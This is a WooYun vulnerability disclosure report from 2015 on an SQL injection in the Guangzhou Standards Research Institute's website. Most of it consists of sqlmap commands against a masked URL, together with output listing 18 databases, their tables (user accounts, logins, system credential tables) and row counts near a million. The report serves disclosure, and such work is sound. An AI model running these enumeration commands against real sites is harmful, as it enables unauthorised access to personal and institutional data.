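Vulnerability summary

Bug ID: wooyun-2015-0154777

Vulnerability title: An SQL injection at Guangzhou Standards Research Institute (广州市标准研究院) leaks hundreds of thousands to millions of records; data from 18 databases exposed

Affected vendor: Guangzhou Standards Research Institute (广州市标准研究院)

Author: IceKing

Submitted: 2015-11-26 21:32

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (Guangdong Information Security Evaluation Center, 广东省信息安全测评中心) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]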


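Vulnerability details

Disclosure status:

2015-11-26: Details reported to the vendor; awaiting vendor handling
2015-11-27: Vendor confirmed; details disclosed to the vendor only
2015-12-07: Details disclosed to core white hats and experts in related fields
2015-12-17: Details disclosed to regular white hats
2015-12-27: Details disclosed to trainee white hats
2016-01-11: Details disclosed to the public

Brief description:

RT (as in the title)

Detailed description:

Over a million records leaked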
<code>sqlmap.py -u "http://**.**.**.**/cb/QS_detail.asp?iAutoID=261" --dbs
available databases [18]:
[*] BZ
[*] BZClient
[*] DLog
[*] eLibrary
[*] eLibraryClient
[*] eLibraryNew
[*] ESAdmin2002Lib
[*] ESFood
[*] GZlitareturedb
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] temp
[*] tempdb
[*] tempGot
[*] tuser
sqlmap.py -u "http://**.**.**.**/cb/QS_detail.asp?iAutoID=261" --tables
Database: tuser
[15 tables]
+--------------------------------------------------+
| dbo.Criter_f |
| dbo.Criter_n |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.tUserAccount |
| dbo.tUserlook |
| dbo.tUserorder |
| dbo.tlookscan |
| dbo.tlookscan_del |
| dbo.tlookscan_new |
| dbo.torderscan |
| dbo.torderscan_del |
| dbo.torderscan_new |
| dbo.tuser_c |
+--------------------------------------------------+
Database: pubs
[14 tables]
+--------------------------------------------------+
| dbo.authors |
| dbo.discounts |
| dbo.employee |
| dbo.jobs |
| dbo.pub_info |
| dbo.publishers |
| dbo.roysched |
| dbo.sales |
| dbo.stores |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.titleauthor |
| dbo.titles |
| dbo.titleview |
+--------------------------------------------------+
Database: Northwind
[31 tables]
+--------------------------------------------------+
| dbo.Categories |
| dbo.CustomerCustomerDemo |
| dbo.CustomerDemographics |
| dbo.Customers |
| dbo.EmployeeTerritories |
| dbo.Employees |
| dbo.Invoices |
| dbo.Orders |
| dbo.Products |
| dbo.Region |
| dbo.Shippers |
| dbo.Suppliers |
| dbo.Territories |
| dbo.[Alphabetical list of products] |
| dbo.[Category Sales for 1997] |
| dbo.[Current Product List] |
| dbo.[Customer and Suppliers by City] |
| dbo.[Order Details Extended] |
| dbo.[Order Details] |
| dbo.[Order Subtotals] |
| dbo.[Orders Qry] |
| dbo.[Product Sales for 1997] |
| dbo.[Products Above Average Price] |
| dbo.[Products by Category] |
| dbo.[Quarterly Orders] |
| dbo.[Sales Totals by Amount] |
| dbo.[Sales by Category] |
| dbo.[Summary of Sales by Quarter] |
| dbo.[Summary of Sales by Year] |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+
Database: eLibraryClient
[81 tables]
+--------------------------------------------------+
| [dbo CallBoard] |
| [dbo(dtproperties] |
| [dbo,EmployeSub3] |
| [dbo-EmployeV] |
| dbo.AdmFunction |
| dbo.AdmGLinkF |
| dbo.AdmGroup |
| dbo.AdmOrgan |
| dbo.AdmPLinkF |
| dbo.AdmPLinkG |
| dbo.AdmPLinkO |
| dbo.AdmPLinkOa |
| dbo.AdmPLogin |
| dbo.AdmPerson |
| dbo.AdmSystem |
| dbo.BTab009 |
| dbo.BTab015 |
| dbo.BTab103 |
| dbo.BTab401 |
| dbo.BTab402 |
| dbo.BTab403 |
| dbo.BTabMain |
| dbo.BTable_tmp |
| dbo.BZ_PDF |
| dbo.BZ_PDF_Custom |
| dbo.BZ_top_cache |
| dbo.BookDetail |
| dbo.BookHistory |
| dbo.BookHistoryV |
| dbo.BookSub |
| dbo.BookSubV |
| dbo.Book_Main |
| dbo.Book_MainV |
| dbo.CB2_File |
| dbo.CallBoard2 |
| dbo.CallBoard2_Child |
| dbo.CriterV |
| dbo.Criter_Info |
| dbo.Criter_uploadLog_H |
| dbo.Criter_uploadLog_child |
| dbo.ESCOMCounter |
| dbo.ESComRegist |
| dbo.ESComRegist_Log |
| dbo.ESEditMark |
| dbo.Employe |
| dbo.EmployeSub1 |
| dbo.EmployeSub2 |
| dbo.GetMaxBarMain |
| dbo.GetMaxID |
| dbo.ICS_chinaType |
| dbo.ICStree_0 |
| dbo.ICStree_1 |
| dbo.INetLogV |
| dbo.ImPleMentDateV |
| dbo.Industry |
| dbo.ListSet |
| dbo.OperatorReg |
| dbo.OperatorRegV |
| dbo.PrintCriter |
| dbo.PrintCriterV |
| dbo.TMark |
| dbo.Tree201 |
| dbo.Tree401 |
| dbo.Tree402 |
| dbo.Tree403 |
| dbo.TreeMain |
| dbo.WebSite_Log |
| dbo.WebSite_LogV |
| dbo.[BTab01.] |
| dbo.[BTab02.] |
| dbo.[BTab40.] |
| dbo.[Tree20.] |
| dbo.[Tree40.] |
| dbo.sy@seg@ents |
| dbo.sysconstraints |
| dbo.tUserAccount |
| dbo.tUserAccountV |
| dbo.tUserOrder |
| dbo.tUserRegister |
| dbo.tUserRegister_cCode |
| dbo.tUserRegister_child |
+--------------------------------------------------+
Database: temp
[29 tables]
+--------------------------------------------------+
| dbo.AdmFunction |
| dbo.AdmGLinkF |
| dbo.AdmGroup |
| dbo.AdmOrgan |
| dbo.AdmPLinkF |
| dbo.AdmPLinkG |
| dbo.AdmPLinkO |
| dbo.AdmPLinkOa |
| dbo.AdmPLogin |
| dbo.AdmPerson |
| dbo.AdmSystem |
| dbo.BTable |
| dbo.BTable_tmp |
| dbo.CallBoard |
| dbo.Criter |
| dbo.Criter_Food |
| dbo.Criter_FoodV |
| dbo.Criter_Food_Tree |
| dbo.Criter_Food_ref |
| dbo.ESCOMTree351 |
| dbo.ESCOMTree602 |
| dbo.ESCOMUnit351 |
| dbo.ESCOMUnit351_Tree |
| dbo.ESCOMUnit602 |
| dbo.ESCOMUnit602_Tree |
| dbo.ReplceCriter |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+
Database: GZlitareturedb
[171 tables]
+--------------------------------------------------+
| [dbo CriterCue] |
| [dbo TSysRPermit] |
| [dbo(EpBase] |
| [dbo(UserTab] |
| [dbo,GB2008] |
| [dbo,V_Criter] |
| [dbo-HB2008] |
| [dbo-V_CriterInfo_Cy] |
| dbo.BackCode |
| dbo.BackCriter_CriterQ |
| dbo.BuyCriter |
| dbo.CN_N |
| dbo.CN_O |
| dbo.CN_QT_O |
| dbo.CNumberQ |
| dbo.CountMoney |
| dbo.Criter |
| dbo.CriterInfo |
| dbo.CriterON |
| dbo.CriterQ |
| dbo.CriterType |
| dbo.Criter_Back1 |
| dbo.DefaultMoney |
| dbo.Epbase_ProDuctQ |
| dbo.Epbase_ProDuct_UseCriteQ |
| dbo.FindCriListQ |
| dbo.HY_152 |
| dbo.ICS |
| dbo.IncludeFile |
| dbo.InputLog |
| dbo.Ken_Criter |
| dbo.Ken_RZ |
| dbo.LeavMoney |
| dbo.Me@ber@riter@nfo |
| dbo.Member |
| dbo.Member1 |
| dbo.MemberCriter |
| dbo.MemberCriterQ |
| dbo.MemberCriter_CriterQ |
| dbo.MemberCriter_TotalMoney |
| dbo.Member_BuyCriter |
| dbo.Member_SaveMoney |
| dbo.MenuTab |
| dbo.MothTotalQ |
| dbo.ProCriter |
| dbo.ProDuct |
| dbo.ProState |
| dbo.ProUseCriter |
| dbo.ProViderandsavemoneyQ |
| dbo.ProtCriter |
| dbo.ProtEpName |
| dbo.ProtEpName_CriterQ |
| dbo.Provider |
| dbo.Provider2 |
| dbo.ProviderAndleavMoneyQ |
| dbo.ProviderandbuycriterQ |
| dbo.QCriterion |
| dbo.QT_N |
| dbo.Read_ToTalMoney |
| dbo.ReaderCriter |
| dbo.ReaderCriterQ |
| dbo.Reader_BuyCriter |
| dbo.ReplceCriter |
| dbo.RidhtTab |
| dbo.SaveMoney |
| dbo.SpendMoneyQ |
| dbo.StdRegNo |
| dbo.TPDFxx |
| dbo.TQybab |
| dbo.TSysPermit |
| dbo.TSysRoleInfo |
| dbo.TSysUsers |
| dbo.TableFiled |
| dbo.TableName |
| dbo.TableStru |
| dbo.Tbmxx |
| dbo.Tbpgxmp |
| dbo.Tbzckjr |
| dbo.Tbzgxmb |
| dbo.Tbzwbdjm |
| dbo.Thfjfmx |
| dbo.Tqybzsl |
| dbo.Tqybzszb |
| dbo.Tydfw |
| dbo.Tydhy |
| dbo.Tzt |
| dbo.UseMoney |
| dbo.VIEW1 |
| dbo.VIEW2 |
| dbo.VMemberCriter |
| dbo.VReaderCriter |
| dbo.VSaveMoney |
| dbo.VSaveMoneyQ |
| dbo.V_Bzckjr |
| dbo.V_Bzwbjm |
| dbo.V_CriState |
| dbo.V_FindCriterCue |
| dbo.V_ICS_China_Type |
| dbo.V_Member |
| dbo.V_NewCriInfor |
| dbo.V_ProEpCr |
| dbo.V_ReCri |
| dbo.V_ReaderCriter_Cy |
| dbo.V_Reader_CriterQ |
| dbo.V_Reader_CriterQ_MoreCheckNew |
| dbo.V_TCriterCueCriterCriterType |
| dbo.V_TSysUsers |
| dbo.WorkDay |
| dbo.[Re`der_Crite`Q] |
| dbo.[TSysPermit20.50610] |
| dbo.[qt\c_o\] |
| dbo._del_Member |
| dbo.bzwb |
| dbo.c_1 |
| dbo.c_2 |
| dbo.c_3 |
| dbo.classbuild |
| **.**.**.**_201503_criter_new |
| **.**.**.**_201503_criter_old_f |
| **.**.**.**_c_n |
| **.**.**.**_c_n_ |
| **.**.**.**_c_o |
| **.**.**.**_c_o_ |
| dbo.criter_03 |
| dbo.criter_aaa |
| dbo.criter_new |
| dbo.criter_old |
| dbo.criter_rl |
| dbo.criter_totle |
| dbo.criterbak1 |
| dbo.criterbak2 |
| dbo.criterbak3 |
| dbo.criterbak4 |
| dbo.dbj_2 |
| dbo.dtproperties |
| dbo.implementdate_check |
| dbo.llp |
| dbo.member_LeavMoney |
| dbo.member_LeavMoneyInfo |
| dbo.new |
| dbo.old |
| dbo.old_0924 |
| dbo.old_2 |
| dbo.old_3 |
| dbo.old_new |
| dbo.qtX201503_criter_old_f |
| dbo.qt_201503_criter_new |
| dbo.qt_c_n |
| dbo.qt_c_n_ |
| dbo.qt_c_o |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.temp_criter |
| dbo.temp_file |
| dbo.temp_issueyear |
| dbo.temp_pdf |
| dbo.temp_pdf_needtocopy |
| dbo.temp_pdf_notincriter |
| dbo.temp_tif |
| dbo.temp_tifnotscan |
| dbo.temp_xjs |
| dbo.temp_xjs1 |
| dbo.update_1 |
| dbo.update_2 |
| dbo.vBuyCriter |
| dbo.v_Tbzgxmx |
| dbo.v_Temp_Thfjfmx |
| dbo.v_Temp_Thfjfmx_tmp |
| dbo.v_Thfjfmx |
| dbo.v_Thfjfmx_hf |
| dbo.zfdb |
+--------------------------------------------------+
Database: eLibrary
[104 tables]
+--------------------------------------------------+
| [dbo BZ_PDF] |
| [dbo(Criter_censorV] |
| [dbo,Criter_set_censor] |
| [dbo-Criter_uploadLog_child] |
| dbo.AdmFunction |
| dbo.AdmGLinkF |
| dbo.AdmGroup |
| dbo.AdmOrgan |
| dbo.AdmPLinkF |
| dbo.AdmPLinkG |
| dbo.AdmPLinkO |
| dbo.AdmPLinkOa |
| dbo.AdmPLogin |
| dbo.AdmPerson |
| dbo.AdmSystem |
| dbo.BTab009 |
| dbo.BTab015 |
| dbo.BTab103 |
| dbo.BTab401 |
| dbo.BTab402 |
| dbo.BTab403 |
| dbo.BTabMain |
| dbo.BTable |
| dbo.BTable_tmp |
| dbo.BZ_PDF_Custom |
| dbo.BZ_PDF_Plan |
| dbo.BZ_top_cache |
| dbo.BookDetail |
| dbo.BookDetailV |
| dbo.BookHistory |
| dbo.BookHistoryV |
| dbo.BookSub |
| dbo.BookSubV |
| dbo.Book_Main |
| dbo.Book_MainV |
| dbo.CB2_File |
| dbo.CallBoard |
| dbo.CallBoard2 |
| dbo.CallBoard2_Child |
| dbo.CriterV |
| dbo.Criter_Info |
| dbo.Criter_oldCriter |
| dbo.Criter_oldCriter_split |
| dbo.Criter_uploadLog_H |
| dbo.ESCOMCounter |
| dbo.ESCOMTree602 |
| dbo.ESCOMUnit602 |
| dbo.ESCOMUnit602_Tree |
| dbo.ESComRegist |
| dbo.ESComRegist_Log |
| dbo.ESEditMark |
| dbo.ESgb2760 |
| dbo.Employe |
| dbo.EmployeSub1 |
| dbo.EmployeSub2 |
| dbo.EmployeSub3 |
| dbo.EmployeV |
| dbo.Ge@Max@D |
| dbo.GetMaxBarMain |
| dbo.ICS_chinaType |
| dbo.ICStree_0 |
| dbo.ICStree_1 |
| dbo.INetLogV |
| dbo.ImPleMentDateV |
| dbo.ListSet |
| dbo.OperatorReg |
| dbo.OperatorRegV |
| dbo.PrintCriter |
| dbo.PrintCriterV |
| dbo.TMark |
| dbo.Tree201 |
| dbo.Tree401 |
| dbo.Tree402 |
| dbo.Tree403 |
| dbo.TreeMain |
| dbo.WebSite_Log |
| dbo.WebSite_LogV |
| dbo.[BTab01.] |
| dbo.[BTab02.] |
| dbo.[BTab40.] |
| dbo.[Tree20.] |
| dbo.[Tree40.] |
| dbo.[tU`erO`derV] |
| dbo.aa |
| dbo.dtproperties |
| dbo.gb2760 |
| dbo.iapps |
| dbo.pangolin_test_table |
| dbo.sqlmapoutput |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.tUserAccount |
| dbo.tUserAccountV |
| dbo.tUserAccount_Total |
| dbo.tUserAccount_Total2 |
| dbo.tUserAccount_Total3 |
| dbo.tUserOrder |
| dbo.tUserOrder_downloadCount |
| dbo.tUserOrder_updateCriter |
| dbo.tUserRegister |
| dbo.tUserRegister_cCode |
| dbo.tUserRegister_child |
| dbo.u_c |
| dbo.use1 |
+--------------------------------------------------+
Database: tempdb
[2 tables]
+--------------------------------------------------+
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+
Database: ESFood
[38 tables]
+--------------------------------------------------+
| [dbo GB 760] |
| dbo.AdmFunction |
| dbo.AdmGLinkF |
| dbo.AdmGroup |
| dbo.AdmOrgan |
| dbo.AdmPLinkF |
| dbo.AdmPLinkG |
| dbo.AdmPLinkO |
| dbo.AdmPLinkOa |
| dbo.AdmPLogin |
| dbo.AdmPerson |
| dbo.AdmSystem |
| dbo.BTable |
| dbo.BTable_tmp |
| dbo.CB2_File |
| dbo.CallBoard |
| dbo.CallBoard2 |
| dbo.CallBoard2_Child |
| dbo.CriterV |
| dbo.Criter_Food |
| dbo.Criter_FoodV |
| dbo.Criter_Food_Tree |
| dbo.Criter_Food_ref |
| dbo.Criter_food_joinV |
| dbo.Criter_food_treeV |
| dbo.ESCOMTree351 |
| dbo.ESCOMTree602 |
| dbo.ESCOMUnit351 |
| dbo.ESCOMUnit351_Tree |
| dbo.ESCOMUnit602 |
| dbo.ESCOMUnit602_Tree |
| dbo.ESCOMtree351V |
| dbo.GB2760V |
| dbo.GB2760_Tree |
| dbo.GB2760_Type |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+
Database: ESAdmin2002Lib
[14 tables]
+--------------------------------------------------+
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.tFunction |
| dbo.tGLinkF |
| dbo.tGroup |
| dbo.tLog |
| dbo.tOrgan |
| dbo.tPLinkF |
| dbo.tPLinkG |
| dbo.tPLinkO |
| dbo.tPLogin |
| dbo.tPerson |
| dbo.tSystem |
+--------------------------------------------------+
Database: master
[36 tables]
+--------------------------------------------------+
| dbo.MSreplication_options |
| dbo.[INFORMATION_SCHEMA.CHECK_CONSTRAINTS] |
| dbo.[INFORMATION_SCHEMA.COLUMNS] |
| dbo.[INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE] |
| dbo.[INFORMATION_SCHEMA.COLUMN_PRIVILEGES] |
| dbo.[INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE] |
| dbo.[INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE] |
| dbo.[INFORMATION_SCHEMA.DOMAINS] |
| dbo.[INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS] |
| dbo.[INFORMATION_SCHEMA.KEY_COLUMN_USAGE] |
| dbo.[INFORMATION_SCHEMA.PARAMETERS] |
| dbo.[INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS] |
| dbo.[INFORMATION_SCHEMA.ROUTINES] |
| dbo.[INFORMATION_SCHEMA.ROUTINE_COLUMNS] |
| dbo.[INFORMATION_SCHEMA.SCHEMATA] |
| dbo.[INFORMATION_SCHEMA.TABLES] |
| dbo.[INFORMATION_SCHEMA.TABLE_CONSTRAINTS] |
| dbo.[INFORMATION_SCHEMA.TABLE_PRIVILEGES] |
| dbo.[INFORMATION_SCHEMA.VIEWS] |
| dbo.[INFORMATION_SCHEMA.VIEW_COLUMN_USAGE] |
| dbo.[INFORMATION_SCHEMA.VIEW_TABLE_USAGE] |
| dbo.spt_datatype_info |
| dbo.spt_datatype_info_ext |
| dbo.spt_fallback_db |
| dbo.spt_fallback_dev |
| dbo.spt_fallback_usg |
| dbo.spt_monitor |
| dbo.spt_provider_types |
| dbo.spt_server_info |
| dbo.spt_values |
| dbo.sysconstraints |
| dbo.syslogins |
| dbo.sysoledbusers |
| dbo.sysopentapes |
| dbo.sysremotelogins |
| dbo.syssegments |
+--------------------------------------------------+
Database: DLog
[5 tables]
+--------------------------------------------------+
| dbo.INetLog |
| dbo.INetLogH |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+
Database: tempGot
[135 tables]
+--------------------------------------------------+
| [dbo VSaveMoney] |
| [dbo llp] |
| [dbo(MemberCriter_CriterQ] |
| [dbo,MenuTab] |
| [dbo-MothTotalQ] |
| dbo.BZ10069 |
| dbo.BZ_PDF |
| dbo.BackCode |
| dbo.BackCriter_CriterQ |
| dbo.BuyCriter |
| dbo.CNumberQ |
| dbo.CountMoney |
| dbo.Criter |
| dbo.CriterCue |
| dbo.CriterInfo |
| dbo.CriterON |
| dbo.CriterQ |
| dbo.CriterType |
| dbo.Criter_ |
| dbo.Criter_Back1 |
| dbo.DefaultMoney |
| dbo.EpBase |
| dbo.Epbase_ProDuctQ |
| dbo.Epbase_ProDuct_UseCriteQ |
| dbo.FindCriListQ |
| dbo.ICS |
| dbo.IncludeFile |
| dbo.InputLog |
| dbo.Ken_Criter |
| dbo.Ken_RZ |
| dbo.LeavMoney |
| dbo.Member |
| dbo.Member1 |
| dbo.MemberCriter |
| dbo.MemberCriterInfo |
| dbo.MemberCriterQ |
| dbo.MemberCriter_TotalMoney |
| dbo.Member_BuyCriter |
| dbo.Member_SaveMoney |
| dbo.Org |
| dbo.ProCriter |
| dbo.ProDuct |
| dbo.ProState |
| dbo.ProUseCriter |
| dbo.ProViderandsavemoneyQ |
| dbo.ProtCriter |
| dbo.ProtEpName |
| dbo.ProtEpName_CriterQ |
| dbo.Provider |
| dbo.Provider2 |
| dbo.ProviderAndleavMoneyQ |
| dbo.ProviderandbuycriterQ |
| dbo.QCriterion |
| dbo.Re@der@riter |
| dbo.Read_ToTalMoney |
| dbo.ReaderCriterQ |
| dbo.Reader_BuyCriter |
| dbo.Reader_CriterQ |
| dbo.ReplceBriter |
| dbo.RightTab |
| dbo.SaveMoney |
| dbo.SpendMoneyQ |
| dbo.StdRegNo |
| dbo.TPDFxx |
| dbo.TQybab |
| dbo.TSysRPermit |
| dbo.TSysRoleInfo |
| dbo.TSysUsdrs |
| dbo.TableFiled |
| dbo.TableName |
| dbo.TableStru |
| dbo.Tbmxx |
| dbo.Tbzckjr |
| dbo.Tbzgxmb |
| dbo.Tbzgxmx |
| dbo.Tbzwbdjm |
| dbo.Thfjfmx |
| dbo.Tqybzsl |
| dbo.Tqybzszb |
| dbo.Tydfw |
| dbo.Tydhy |
| dbo.Tzt |
| dbo.UseMoney |
| dbo.UserTab |
| dbo.VIEW1 |
| dbo.VIEW2 |
| dbo.VMemberCriter |
| dbo.VReaderCriter |
| dbo.VSaueMoneyQ |
| dbo.V_Bzckjr |
| dbo.V_Bzwbjm |
| dbo.V_CriState |
| dbo.V_Criter |
| dbo.V_CriterInfo_Cy |
| dbo.V_FindCriterCue |
| dbo.V_ICS_China_Type |
| dbo.V_Member |
| dbo.V_NewCriInfor |
| dbo.V_ProEpCr |
| dbo.V_ReCri |
| dbo.V_ReaderCriter_Cy |
| dbo.V_Reader_CriterQ |
| dbo.V_Reader_CriterQ_MoreCheckNew |
| dbo.V_TCriterCueCriterCriterType |
| dbo.V_TSysUsers |
| dbo.WorkDay |
| dbo.[BZ1241.] |
| dbo.[TS`sPe`mit] |
| dbo.[TSysPermit20.50610] |
| dbo._del_Member |
| dbo.bzwb |
| dbo.classbuild |
| dbo.dtproperties |
| dbo.implementdate_check |
| dbo.member_LeavMoney |
| dbo.member_LeavMoneyInfo |
| dbo.productCode |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.temp_criter |
| dbo.temp_file |
| dbo.temp_issueyear |
| dbo.temp_pdf |
| dbo.temp_pdf_needtocopy |
| dbo.temp_pdf_notincriter |
| dbo.temp_tif |
| dbo.temp_tifnotscan |
| dbo.temp_xjs |
| dbo.temp_xjs1 |
| dbo.vBuyCriter |
| dbo.v_Tbzgxmx |
| dbo.v_Temp_Thfjfmx |
| dbo.v_Temp_Thfjfmx_tmp |
| dbo.v_Thfjfmx |
| dbo.v_Thfjfmx_hf |
+--------------------------------------------------+
Database: msdb
[77 tables]
+--------------------------------------------------+
| [dbo RTblRelshipProps] |
| [dbo(RTblTypeLibs] |
| [dbo,RTblVersions] |
| [dbo-RTblWorkspaceItems] |
| dbo.RTblClassDefs |
| dbo.RTblDBMProps |
| dbo.RTblDBXProps |
| dbo.RTblDTMProps |
| dbo.RTblDTSProps |
| dbo.RTblDatabaseVersion |
| dbo.RTblEQMProps |
| dbo.RTblEnumerationDef |
| dbo.RTblEnumerationValueDef |
| dbo.RTblGENProps |
| dbo.RTblIfaceDefs |
| dbo.RTblIfaceHier |
| dbo.RTblIfaceMem |
| dbo.RTblMDSProps |
| dbo.RTblNamedObj |
| dbo.RTblOLPProps |
| dbo.RTblParameterDef |
| dbo.RTblPropDefs |
| dbo.RTblProps |
| dbo.RTblRelColDefs |
| dbo.RTblRelshipDefs |
| dbo.RTblRelships |
| dbo.RTblSIMProps |
| dbo.RTblScriptDefs |
| dbo.RTblSites |
| dbo.RTblSumInfo |
| dbo.RTblTFMProps |
| dbo.RTblTypeInfo |
| dbo.RTblUMLProps |
| dbo.RTblUMXProps |
| dbo.RTblVersionAdminInfo |
| dbo.backupfile |
| dbo.backupmediafamily |
| dbo.backupmediaset |
| dbo.backupset |
| dbo.log_shipping_primaries |
| dbo.log_shipping_secondaries |
| dbo.logmarkhistory |
| dbo.mswebtasks |
| dbo.restorefile |
| dbo.restorefilegroup |
| dbo.restorehistory |
| dbo.sqlagent_info |
| dbo.sy@job@chedu@es |
| dbo.sysalerts |
| dbo.syscachedcredentials |
| dbo.syscategories |
| dbo.sysconstraints |
| dbo.sysdbmaintplan_databases |
| dbo.sysdbmaintplan_history |
| dbo.sysdbmaintplan_jobs |
| dbo.sysdbmaintplans |
| dbo.sysdownloadlist |
| dbo.sysdtscategories |
| dbo.sysdtspackagelog |
| dbo.sysdtspackages |
| dbo.sysdtssteplog |
| dbo.sysdtstasklog |
| dbo.sysjobhistory |
| dbo.sysjobs |
| dbo.sysjobs_view |
| dbo.sysjobservers |
| dbo.sysjobsteps |
| dbo.sysnotifications |
| dbo.sysoperators |
| dbo.syssegments |
| dbo.systargetservergroupmembers |
| dbo.systargetservergroups |
| dbo.systargetservers |
| dbo.systargetservers_view |
| dbo.systaskids |
| dbo.systasks |
| dbo.systasks_view |
+--------------------------------------------------+
Database: BZClient
[5 tables]
+--------------------------------------------------+
| dbo.Criter |
| dbo.ICS |
| dbo.productCode |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+
Database: model
[2 tables]
+--------------------------------------------------+
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+
Database: BZ
[12 tables]
+--------------------------------------------------+
| dbo.Criter |
| dbo.ICS |
| dbo.ansi |
| dbo.bs |
| dbo.din |
| dbo.dtproperties |
| dbo.en |
| dbo.iso |
| dbo.nf |
| dbo.productCode |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+
Database: eLibraryNew
[142 tables]
+--------------------------------------------------+
| [dbo BZ_PDF] |
| [dbo USA_CFR_ProductCode] |
| [dbo(CB2_File] |
| [dbo(??????] |
| [dbo,Criter_Package_list] |
| [dbo-Criter_PackageV] |
| dbo.AdmFunction |
| dbo.AdmGLinkF |
| dbo.AdmGroup |
| dbo.AdmOrgan |
| dbo.AdmPLinkF |
| dbo.AdmPLinkG |
| dbo.AdmPLinkO |
| dbo.AdmPLinkOa |
| dbo.AdmPLogin |
| dbo.AdmPerson |
| dbo.AdmSystem |
| dbo.BTab009 |
| dbo.BTab015 |
| dbo.BTab103 |
| dbo.BTab401 |
| dbo.BTab402 |
| dbo.BTab403 |
| dbo.BTabMain |
| dbo.BTable_tmp |
| dbo.BZ_PDF_Custom |
| dbo.BZ_PDF_Plan |
| dbo.BZ_top_cache |
| dbo.BookDetail |
| dbo.BookDetailV |
| dbo.BookHistory |
| dbo.BookHistoryV |
| dbo.BookSub |
| dbo.BookSubV |
| dbo.Book_Main |
| dbo.Book_MainV |
| dbo.CAC |
| dbo.CallBoard |
| dbo.CallBoard2 |
| dbo.CallBoard2_Child |
| dbo.CriterV |
| dbo.CriterV3 |
| dbo.Criter_Info |
| dbo.Criter_Package |
| dbo.Criter_Publisher |
| dbo.Criter_censorV |
| dbo.Criter_productCode |
| dbo.Criter_productCode_ |
| dbo.Criter_set_censor |
| dbo.Criter_uploadLog_H |
| dbo.Criter_uploadLog_child |
| dbo.ES@omR@gist |
| dbo.ESBOMTree602 |
| dbo.ESCOMCounter |
| dbo.ESCOMUnit602 |
| dbo.ESCOMUnit602_Tree |
| dbo.ESComRegist_Log |
| dbo.ESEditMark |
| dbo.EUR_lex |
| dbo.EUR_lexV |
| dbo.EUR_lex_productCode |
| dbo.EUR_title |
| dbo.EU_2 |
| dbo.EU_25T |
| dbo.EU_TRAND |
| dbo.Elig_ASS |
| dbo.Elig_ASS_productCode |
| dbo.Elig_Mode |
| dbo.Employe |
| dbo.EmployeSub1 |
| dbo.EmployeSub2 |
| dbo.EmployeSub3 |
| dbo.EmployeV |
| dbo.Eu_26T |
| dbo.Eur_25 |
| dbo.GetMaxBarMain |
| dbo.GetMaxID |
| dbo.ICR_chinaType |
| dbo.ICStree_0 |
| dbo.ICStree_1 |
| dbo.INetLogV |
| dbo.ImPleMentDateV |
| dbo.Industry |
| dbo.Japan_FG |
| dbo.Japan_FGV |
| dbo.Japan_FG_productCode |
| dbo.Japan_FG_type |
| dbo.Japan_PLS |
| dbo.Japan_PLS_productCode |
| dbo.Japan_product |
| dbo.ListSet |
| dbo.OperatorRegV |
| dbo.Or |
| dbo.Org |
| dbo.Part_en |
| dbo.PrintCriter |
| dbo.PrintCriterV |
| dbo.Sheet1 |
| dbo.TBT1 |
| dbo.TBT_SPS |
| dbo.TBT_SPS_productCode |
| dbo.TBT_Warning |
| dbo.TMark |
| dbo.Tree201 |
| dbo.Tree401 |
| dbo.Tree402 |
| dbo.Tree403 |
| dbo.TreeMain |
| dbo.USA_CFR |
| dbo.USA_CFRV |
| dbo.USA_TRAND |
| dbo.USA_partName |
| dbo.USA_title |
| dbo.WebSite_Log |
| dbo.WebSite_LogV |
| dbo.[BTab01.] |
| dbo.[BTab02.] |
| dbo.[BTab40.] |
| dbo.[Eur_20.70123] |
| dbo.[Op`rat`rReg] |
| dbo.[Tree20.] |
| dbo.[Tree40.] |
| dbo.[????] |
| dbo._USA_CFR |
| dbo.aaa |
| dbo.dtproperties |
| dbo.prhductCodeV_javascript |
| dbo.productCode |
| dbo.student |
| dbo.sysconstraints |
| dbo.sysseglents |
| dbo.tUserAccount |
| dbo.tUserAccountV |
| dbo.tUserOrder |
| dbo.tUserOrderV |
| dbo.tUserOrder_downloadCount |
| dbo.tUserOrder_updateCriter |
| dbo.tUserRegister |
| dbo.tUserRegister_cCode |
| dbo.tUserRegister_child |
| dbo.usa_a |
| dbo.usa_p |
+--------------------------------------------------+
sqlmap.py -u "http://**.**.**.**/cb/QS_detail.asp?iAutoID=261" --tables --count
[20:13:57] [INFO] resumed: 98698
[20:13:57] [INFO] resumed: 183205
[20:13:57] [INFO] resumed: 98525
[20:13:57] [INFO] resumed: 674915
[20:13:57] [INFO] resumed: 2843
[20:13:57] [INFO] resumed: 2843
[20:13:57] [INFO] resumed: 6781
[20:13:57] [INFO] resumed: 14720
[20:13:57] [INFO] resumed: 34599
[20:15:24] [INFO] resumed: 24097
[20:15:24] [INFO] resumed: 1072530
[20:15:24] [INFO] resumed: 90426
[20:15:24] [INFO] resumed: 1074079
[20:15:24] [INFO] resumed: 1074450
[20:15:24] [INFO] resumed: 207466
[20:15:24] [INFO] resumed: 16993
[20:15:24] [INFO] resumed: 5755
[20:15:24] [INFO] resumed: 2954
[20:15:24] [INFO] resumed: 11597
[20:15:25] [INFO] resumed: 3832
[20:15:25] [INFO] resumed: 3916
